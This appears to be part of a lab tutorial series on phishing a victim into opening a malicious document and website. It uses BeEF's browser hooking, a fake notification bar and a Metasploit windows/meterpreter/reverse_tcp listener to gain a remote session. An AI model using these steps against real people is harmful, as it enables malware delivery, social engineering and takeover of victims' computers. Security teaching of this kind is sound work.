In Part 4 of this series you can sit back and enjoy the fruits of your work as all we need to do now is ensure everything is running then launch our attack. We will email a link to our victim and then once the file is downloaded and opened we will see how everything fits together to exploit the victims computer. Come back for future videos when we will show some post exploitation steps we can take now we have control of our victim.
If you have not read the previous explanations or watched the videos I recommend taking a look as all the steps are shown and explained in detail, so if you are not sure about something shown here, go back and read the previous guides.
First in our Kali machine we check that BeeF is running by going to our browser URL. You can also see there are no online browser sessions at present in the left hand menu.
Next we ensure our malicious website is running.
Then if have not already done so we create our listener in the metasploit framework on our attacking device so the malware has something to connect back to.
Load our payload
set payload windows/meterpreter/reverse_tcp
Configure our payload, by setting the listening host (lhost) to our attacking machines IP address.
set lhost 192.168.56.106
Then start the listener
Now we are ready. At this point the demo starts to show the victim reading the email. clicking the link, downloading the file then opening it. Activating the malware and connecting to our site.
As soon as the website opens we will have a connection in BeeF as this does not require any user interaction with the site and injects the malware automatically when the web page is visited. You will see online browsers in your web console.
In our demo you will also see us use the commands tab to launch a social engineering attack by using the “Fake notification bar” exploit built in to the console. We can use this to load additional malware onto the system by getting the user to click on the bar and accept the prompt. We will cover this in more depth in future videos.
To get our meterpreter session we need to get the victim to download our security software as advertised on our website and in the malicious document.
Once the victim has carried out these steps you will see the connection in meterpreter. We then run the sysinfo cmd to show we are on the victim machine. Again we will be showing some post exploitation steps in future videos so stay tuned for those.
As you can see from this sort series of videos there are multiple ways that malware can infect your PC, and I hope we have demystified it a little as well.
Cyber attacks will have fall back measures to provide the best odds that if a link is clicked or document opened that they will be successful, which is why we have shown 2 different methods in this demo from the same malicious document.
This has been a very simple demo showing simple methods but I hope we have helped to show the type of things that can happen.
Until next time.